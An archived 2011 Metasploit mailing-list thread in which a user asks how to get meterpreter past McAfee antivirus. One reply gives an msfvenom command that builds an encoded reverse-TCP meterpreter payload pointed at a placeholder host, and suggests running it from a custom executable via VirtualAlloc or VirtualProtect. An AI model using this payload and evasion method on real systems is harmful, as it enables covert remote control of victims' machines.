Metasploit mailing list archives
Re: Yet another AV bypassing question
From: scriptjunkie <scriptjunkie1 () googlemail com>
Date: Fri, 24 Jun 2011 22:28:57 -0500
In short, no it's probably not the DLL. The DLL is not embedded in an executable that Metasploit generates. Try generating a c version of the payload: ruby msfvenom -p windows/meterpreter/reverse_tcp -f c -e x86/shikata_ga_nai LHOST=1.2.3.4 and create your own exe or modify the source of an existing one to run that code. You will need to make it executable before it can be executed as code, look up VirtualAlloc or VirtualProtect. There are plenty of other ways, but that's my favorite. See http://j.mp/mjyb8e if you want to see what goes into an MSF generated exe. On Fri, Jun 24, 2011 at 6:55 PM, Average SecurityGuy <averagesecurityguy () gmail com> wrote:
Have you looked at this http://dev.metasploit.com/redmine/projects/framework/wiki/Using_a_Custom_Executable_to_Bypass_AV? On Fri, Jun 24, 2011 at 5:22 PM, Jason Hawks <jason.hawks0 () gmail com> wrote:Hello list, As many of you, I'm trying to bypass my AV but I'm not lucky with the metasploit encoders anymore. My Question is simple (but I don't know about the answer yet). Does modifying and recompiling meterpreter source code (with spread dummy instructions and a lot of try-and-error attempt) could help me ? or the main problem is not in meterpreter DLL but somewhere else ? Actually I got a try modifying the source code of meterpreter (using Visual Studio Express), but it didn't change anything. Therefore, I'm wondering if it's just a matter of tries or if I'm wasting my time. Am I looking in the right direction ? For information, I'm playing with McAfee 8.X right now. Thank you very much for your lights. Any other tips are welcome. Cheers, Jason _______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework_______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework
-- scriptjunkie http://www.scriptjunkie.us/ _______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework
Current thread:
- Yet another AV bypassing question Jason Hawks (Jun 24)
- Re: Yet another AV bypassing question Average SecurityGuy (Jun 24)
- Re: Yet another AV bypassing question scriptjunkie (Jun 24)
- Re: Yet another AV bypassing question Jason Hawks (Jun 26)
- Re: Yet another AV bypassing question Ozan UÇAR (Jun 27)
- Re: Yet another AV bypassing question Average SecurityGuy (Jun 24)